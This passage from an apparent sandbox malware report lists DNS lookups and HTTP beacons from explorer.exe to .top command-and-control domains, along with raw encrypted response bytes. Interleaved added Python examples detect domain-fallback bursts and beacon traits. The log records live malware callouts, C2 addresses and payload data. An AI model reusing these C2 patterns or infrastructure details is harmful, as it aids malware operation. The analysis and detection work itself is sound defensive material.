Sep 27, 2021 19:34:16.870421886 CEST | 8.8.8.8 | 192.168.2.6 | 0x9de7 | Server failure (2) | umayaniela6.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:17.191394091 CEST | 8.8.8.8 | 192.168.2.6 | 0x30b5 | Name error (3) | lynettaram7.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:17.246506929 CEST | 8.8.8.8 | 192.168.2.6 | 0x9de7 | Server failure (2) | umayaniela6.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:17.385461092 CEST | 8.8.8.8 | 192.168.2.6 | 0x1df1 | Name error (3) | sadineyalas8.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:18.220540047 CEST | 8.8.8.8 | 192.168.2.6 | 0x55dc | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:18.963875055 CEST | 8.8.8.8 | 192.168.2.6 | 0x106 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:19.201778889 CEST | 8.8.8.8 | 192.168.2.6 | 0x9de7 | Server failure (2) | umayaniela6.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:19.591423988 CEST | 8.8.8.8 | 192.168.2.6 | 0x7f59 | No error (0) | privacy-toolz-for-you-403.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:21.831391096 CEST | 8.8.8.8 | 192.168.2.6 | 0xc52f | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:22.457231045 CEST | 8.8.8.8 | 192.168.2.6 | 0x1505 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:23.582813025 CEST | 8.8.8.8 | 192.168.2.6 | 0x1105 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:23.835047007 CEST | 8.8.8.8 | 192.168.2.6 | 0xd0a4 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:29.405194044 CEST | 8.8.8.8 | 192.168.2.6 | 0xdeec | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:29.723232985 CEST | 8.8.8.8 | 192.168.2.6 | 0x2827 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:30.057070017 CEST | 8.8.8.8 | 192.168.2.6 | 0x14bb | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:38.195090055 CEST | 8.8.8.8 | 192.168.2.6 | 0x2d9a | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:38.531582117 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ed4 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:43.740174055 CEST | 8.8.8.8 | 192.168.2.6 | 0x53e2 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:44.088499069 CEST | 8.8.8.8 | 192.168.2.6 | 0xe720 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:44.439909935 CEST | 8.8.8.8 | 192.168.2.6 | 0x7461 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:44.903294086 CEST | 8.8.8.8 | 192.168.2.6 | 0xcdec | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:45.165852070 CEST | 8.8.8.8 | 192.168.2.6 | 0x11b2 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:45.821141958 CEST | 8.8.8.8 | 192.168.2.6 | 0xf8a0 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:46.091289043 CEST | 8.8.8.8 | 192.168.2.6 | 0xa452 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:46.338222980 CEST | 8.8.8.8 | 192.168.2.6 | 0xeb48 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:46.661124945 CEST | 8.8.8.8 | 192.168.2.6 | 0x7644 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:47.002038002 CEST | 8.8.8.8 | 192.168.2.6 | 0xd8e1 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:48.725550890 CEST | 8.8.8.8 | 192.168.2.6 | 0x15ba | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:49.259675026 CEST | 8.8.8.8 | 192.168.2.6 | 0x7ba1 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:49.531271935 CEST | 8.8.8.8 | 192.168.2.6 | 0x8187 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:01.187031031 CEST | 8.8.8.8 | 192.168.2.6 | 0x94ed | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:01.574778080 CEST | 8.8.8.8 | 192.168.2.6 | 0xeed5 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:05.766330004 CEST | 8.8.8.8 | 192.168.2.6 | 0x2f8c | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:06.012435913 CEST | 8.8.8.8 | 192.168.2.6 | 0x44ae | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:06.368376970 CEST | 8.8.8.8 | 192.168.2.6 | 0xc836 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:07.529788971 CEST | 8.8.8.8 | 192.168.2.6 | 0xae09 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.019428968 CEST | 8.8.8.8 | 192.168.2.6 | 0x12d9 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.422373056 CEST | 8.8.8.8 | 192.168.2.6 | 0x7492 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.440402031 CEST | 8.8.8.8 | 192.168.2.6 | 0x189b | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.898325920 CEST | 8.8.8.8 | 192.168.2.6 | 0xa828 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:09.258060932 CEST | 8.8.8.8 | 192.168.2.6 | 0x4960 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:09.507046938 CEST | 8.8.8.8 | 192.168.2.6 | 0xe9f8 | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:12.373219013 CEST | 8.8.8.8 | 192.168.2.6 | 0x75ae | No error (0) | geenaldencia9.top | | 194.147.85.186 | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.012115955 CEST | 8.8.8.8 | 192.168.2.6 | 0xb34e | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:38.045906067 CEST | 8.8.8.8 | 192.168.2.6 | 0xf975 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:38.180354118 CEST | 8.8.8.8 | 192.168.2.6 | 0x5775 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:38.212959051 CEST | 8.8.8.8 | 192.168.2.6 | 0x4880 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:38.249732018 CEST | 8.8.8.8 | 192.168.2.6 | 0x1176 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:38.290045977 CEST | 8.8.8.8 | 192.168.2.6 | 0x9c58 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:38.331665039 CEST | 8.8.8.8 | 192.168.2.6 | 0xd2d8 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:38.444024086 CEST | 8.8.8.8 | 192.168.2.6 | 0xf57f | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 19:35:49.643933058 CEST | 8.8.8.8 | 192.168.2.6 | 0xe8fd | No error (0) | defeatwax.ru | | 193.56.146.188 | A (IP address) | IN (0x0001)
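
In the answers above, eight .top names fail in a row (NXDOMAIN or SERVFAIL) inside roughly four seconds, then geenaldencia9.top resolves and is polled for the rest of the run, and a second name, privacy-toolz-for-you-403.top, resolves to the same address. That ordering is consistent with a list of C2 domains tried in sequence until one answers. The Python below is an added example and not part of the Joe Sandbox report: it parses a thinned copy of those rows and flags the burst-then-resolve pattern plus any address shared by several names. The pipe-separated row layout, the ten-second window and the five-failure threshold are this example's own assumptions, not values the report states.

```python
from collections import defaultdict
from datetime import datetime

# Rows copied from the report's DNS answer table as "timestamp | reply code | name | address",
# thinned to one line per name (the report repeats the umayaniela6.top SERVFAIL three times).
# The pipe layout is this example's own choice, not the report's format.
DNS_ANSWERS = """\
Sep 27, 2021 19:34:14.195302010 CEST | 3 | naghenrietti1.top | none
Sep 27, 2021 19:34:14.326502085 CEST | 3 | kimballiett2.top | none
Sep 27, 2021 19:34:14.465382099 CEST | 3 | xadriettany3.top | none
Sep 27, 2021 19:34:14.513314962 CEST | 3 | jebeccallis4.top | none
Sep 27, 2021 19:34:14.626837969 CEST | 3 | nityanneron5.top | none
Sep 27, 2021 19:34:16.870421886 CEST | 2 | umayaniela6.top | none
Sep 27, 2021 19:34:17.191394091 CEST | 3 | lynettaram7.top | none
Sep 27, 2021 19:34:17.385461092 CEST | 3 | sadineyalas8.top | none
Sep 27, 2021 19:34:18.220540047 CEST | 0 | geenaldencia9.top | 194.147.85.186
Sep 27, 2021 19:34:19.591423988 CEST | 0 | privacy-toolz-for-you-403.top | 194.147.85.186
Sep 27, 2021 19:35:08.440402031 CEST | 0 | t.me | 149.154.167.99
Sep 27, 2021 19:35:49.643933058 CEST | 0 | defeatwax.ru | 193.56.146.188
"""


def parse_ts(text):
    """Parse the report's 'Sep 27, 2021 19:34:14.195302010 CEST' stamps.

    strptime's %f accepts at most six digits, so the nanosecond tail is truncated;
    microsecond precision is plenty for a window measured in seconds."""
    stamp = text.replace(" CEST", "").strip()
    main, frac = stamp.rsplit(".", 1)
    return datetime.strptime(f"{main}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_answers(text):
    """Turn the pipe-separated rows into dicts; 'none' becomes a missing address."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, rcode, name, address = (field.strip() for field in line.split("|"))
        records.append({"ts": parse_ts(ts), "rcode": int(rcode), "name": name.lower(),
                        "address": None if address == "none" else address})
    return records


def tld(name):
    return name.rsplit(".", 1)[-1]


def find_fallback_bursts(records, window_s=10.0, min_failures=5):
    """Flag a run of failed lookups (rcode 2 SERVFAIL or 3 NXDOMAIN) under one TLD
    that ends in a successful resolution within window_s seconds of the first failure."""
    recent_failures = defaultdict(list)   # tld -> [(timestamp, name)]
    bursts = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        t = tld(rec["name"])
        if rec["rcode"] != 0:
            # count each failing name once, however often the resolver was retried
            if rec["name"] not in {n for _, n in recent_failures[t]}:
                recent_failures[t].append((rec["ts"], rec["name"]))
            continue
        in_window = [n for ts, n in recent_failures[t]
                     if (rec["ts"] - ts).total_seconds() <= window_s]
        if len(in_window) >= min_failures:
            bursts.append({"tld": t, "failures": in_window,
                           "resolved": rec["name"], "address": rec["address"]})
        recent_failures[t].clear()   # a success ends the burst for this TLD
    return bursts


def shared_ips(records):
    """Addresses that answer for more than one queried name (likely one operator)."""
    names_by_ip = defaultdict(set)
    for rec in records:
        if rec["address"]:
            names_by_ip[rec["address"]].add(rec["name"])
    return {ip: sorted(names) for ip, names in names_by_ip.items() if len(names) > 1}


if __name__ == "__main__":
    recs = parse_answers(DNS_ANSWERS)
    for burst in find_fallback_bursts(recs):
        print(f"{len(burst['failures'])} failed .{burst['tld']} lookups, then "
              f"{burst['resolved']} -> {burst['address']}")
    for ip, names in shared_ips(recs).items():
        print(f"{ip} serves {', '.join(names)}")
```

On the rows above this reports one burst (eight failed .top names ending in geenaldencia9.top at 194.147.85.186) and one shared address, 194.147.85.186, behind both geenaldencia9.top and privacy-toolz-for-you-403.top. Tune the window and failure count to the resolver logs of the environment; sandbox timing is far denser than a workstation's.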

HTTP Request Dependency Graph

• t.me
• geenaldencia9.top
• privacy-toolz-for-you-403.top
• 193.56.146.41:9080
• 194.180.174.100

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49837 | 149.154.167.99 | 443 |
Timestamp | kBytes transferred | Direction | Data
(no data rows in the report for this session)

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49767 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:18.312551022 CEST | 1413 | OUT | POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://geenaldencia9.top/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 354
    Host: geenaldencia9.top
Sep 27, 2021 19:34:18.468553066 CEST | 1414 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 27 Sep 2021 17:34:18 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
    X-Powered-By: PHP/5.5.38
    Content-Length: 25
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Raw: 14 00 00 00 7b fa f1 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00
    Data Ascii: {i+,GO


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49788 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:30.118969917 CEST | 5385 | OUT | POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://geenaldencia9.top/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 252
    Host: geenaldencia9.top
Sep 27, 2021 19:34:30.273689032 CEST | 5388 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 27 Sep 2021 17:34:30 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
    X-Powered-By: PHP/5.5.38
    Content-Length: 44
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Raw: 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89
    Data Ascii: I:82OI:@_MqBJK,
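
Sessions 1 and 10 above have the shape of a beacon rather than a web request: explorer.exe, which does not normally speak HTTP at all, POSTs form-encoded data to geenaldencia9.top with an Internet Explorer 11 User-Agent and a Referer equal to the target host, and the server answers 404 Not Found with a body that is declared text/html but is almost entirely non-printable bytes whose length matches Content-Length exactly. The Python below, an added example and not part of the report, scores one captured exchange on those traits. The two malicious exchanges are copied from the sessions above, the benign Chrome exchange is constructed for contrast, and the SHELL_PROCESSES set and the 0.6 printable-ratio threshold are this example's assumptions.

```python
# Beacon heuristics for a single captured HTTP exchange (process, request head,
# response head, response body as the report's "Data Raw" hex string).

# Assumption: processes that should never originate an HTTP POST on a workstation.
SHELL_PROCESSES = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe"}

# Copied from session 1 of the report (explorer.exe -> geenaldencia9.top).
SESSION_1 = dict(
    process=r"C:\Windows\explorer.exe",
    request="""POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 354
Host: geenaldencia9.top""",
    response="""HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:18 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 25
Connection: close
Content-Type: text/html; charset=utf-8""",
    body_hex="14 00 00 00 7b fa f1 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00",
)

# Session 10 differs only in request length, response time, body length and body.
SESSION_10 = dict(
    SESSION_1,
    request=SESSION_1["request"].replace("Content-Length: 354", "Content-Length: 252"),
    response=SESSION_1["response"].replace("17:34:18", "17:34:30")
                                  .replace("Content-Length: 25", "Content-Length: 44"),
    body_hex="00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a "
             "40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89",
)

# Constructed benign exchange (not from the report): a browser fetching a tiny page.
BENIGN = dict(
    process=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    request="""GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: text/html""",
    response="""HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 14""",
    body_hex="3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0a",   # "<html></html>\n"
)


def parse_message(block):
    """Return (start line, {lower-case header name: value}) for an HTTP message head."""
    lines = block.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def printable_ratio(data):
    """Share of bytes in 0x20..0x7e: text sits near 1.0, random bytes near 95/256."""
    if not data:
        return 1.0
    return sum(0x20 <= b < 0x7F for b in data) / len(data)


def score_exchange(process, request, response, body_hex, max_printable=0.6):
    """Return status, body size, printable ratio and the list of beacon traits seen."""
    body = bytes.fromhex(body_hex)
    req_line, req = parse_message(request)
    resp_line, resp = parse_message(response)
    status = int(resp_line.split()[1])
    proc = process.rsplit("\\", 1)[-1].lower()
    reasons = []
    if proc in SHELL_PROCESSES:
        if req_line.startswith("POST "):
            reasons.append(f"{proc} issued an HTTP POST")
        if req.get("user-agent", "").lower().startswith("mozilla/"):
            reasons.append(f"{proc} presents a browser User-Agent")
    if req.get("referer", "").rstrip("/") == "http://" + req.get("host", ""):
        reasons.append("Referer points at the target host itself")
    if status == 404 and body:
        reasons.append(f"404 response carries a {len(body)}-byte body")
    declared = resp.get("content-length")
    if declared is not None and int(declared) != len(body):
        reasons.append("Content-Length disagrees with the captured body size")
    ratio = printable_ratio(body)
    if resp.get("content-type", "").startswith("text/") and ratio < max_printable:
        reasons.append(f"text/* Content-Type but only {ratio:.0%} of the body is printable")
    return {"status": status, "body_len": len(body), "printable_ratio": ratio, "reasons": reasons}


if __name__ == "__main__":
    for label, exchange in (("session 1", SESSION_1), ("session 10", SESSION_10), ("benign", BENIGN)):
        result = score_exchange(**exchange)
        print(label, result["status"], f"{result['printable_ratio']:.2f}", result["reasons"])
```

Both report sessions trip five of the six checks (only Content-Length agrees with the body), while the constructed Chrome exchange trips none. The Content-Length check is there because a real 404 page and a padded C2 reply look alike by status alone; the printable-ratio check is what separates them, and 0.6 is a deliberately loose cut so that short HTML error pages are not flagged.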


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.6 | 49800 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:38.251802921 CEST | 5463 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 118
Host: geenaldencia9.top
Sep 27, 2021 19:34:38.407788992 CEST | 5463 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:34:38 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.6 | 49801 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:38.595668077 CEST | 5465 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 307
Host: geenaldencia9.top
Sep 27, 2021 19:34:38.769793034 CEST | 5973 | IN | HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:38 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 33 34 62 61 62 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 af 7c 61 4c c2 42 8f 8c f5 cf 9b 2b 25 9b f6 ba e5 1a b0 1c 67 74 d2 f1 9b 87 cd d1 85 78 51 a1 a2 8f bc 79 d6 1c e0 32 02 50 08 48 db e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 b9 20 59 53 11 5c 5e c2 52 ab 48 11 80 cd 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 23 59 c2 8a 43 d8 06 0e 45 27 28 7d 3c cc e0 04 89 f9 d4 57 80 90 70 89 ec 66 7e 6b 06 ca a2 22 48 32 d2 49 ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 9e 70 9f 8a 86 e8 47 5a ad b2 cb 99 64 51 11 87 4a b1 b8 56 b0 40 f6 0a bf 8b 71 91 c0 75 f0 46 01 ff 56 59 27 04 5b 96 da 19 d1 3a 2d d8 42 06 02 23 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 40 d7 d8 03 f3 1e 7b d3 c1 44 4f 04 38 6d 7c 14 2c 64 e8 b1 14 f1 70 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 5a 50 bc a2 b7 f1 f6 6a 1f a7 e9 4d 51 e2 48 64 cd 25 5c 8d b7 97 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a4 ed e1 5a fc 37 bc 17 fe 2f 63 9e f8 d8 22 4e 42 25 e3 b5 be 34 60 99 46 3e 99 86 11 02 83 37 42 c2 1a ce ae 30 4b 95 f6 ab 26 24 02 18 70 fb e8 f6 9c 81 de bb 0e 63 36 cf 03 27 4e e2 ea bc 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 6f bd 44 af 91 ff 27 b9 87 f9 5d 63 97 ab 96 57 
25 75 b1 d0 ea 85 50 4a 08 3f 56 7a 98 6c 39 c0 5e f3 5c 19 6e 63 95 be 67 3d da 7a 77 6b 56 18 8a 92 2b 0f e9 1c 31 eb cd 7c 1e 15 8e b9 82 7f 8e 02 82 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af fd c6 83 21 49 42 dd ca 8b 21 10 a0 04 5f 61 87 bd d7 51 67 09 3d 8a ef 22 6b 5f 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 40 2c 0f 3a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 09 64 40 a6 9c c1 0c 54 4d 06 ce aa 4c dc a4 a9 3f f0 b1 68 42 bb ca fa be 60 f6 54 e6 26 56 aa 60 f0 89 b4 10 32 c9 e5 22 1b 9c 65 6a a5 ef 61 51 4b
                                                                                                                                                                                                  Data Ascii: 34bab2S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|aLB+%gtxQy2PH0YObyT=a'4! YS\^RHXKg[Ge92)g z6#YCE'(}<Wpf~k"H2I?o|6NI[LeU[0z;+W~5=PVpGZdQJV@quFVY'[:-B#GkKm@@{DO8m|,dp"JG0Z"?kQZPjMQHd%\!&Q#F<pvAZ7/c"NB%4`F>7B0K&$pc6'NGc_,oD']cW%uPJ?Vzl9^\ncg=zwkV+1|N!{K.iw!IB!_aQg="k_zR{}@,:HB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59d@TML?hB`T&V`2"ejaQK


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.6 | 49807 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:43.806826115 CEST | 13442 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 269
Host: geenaldencia9.top
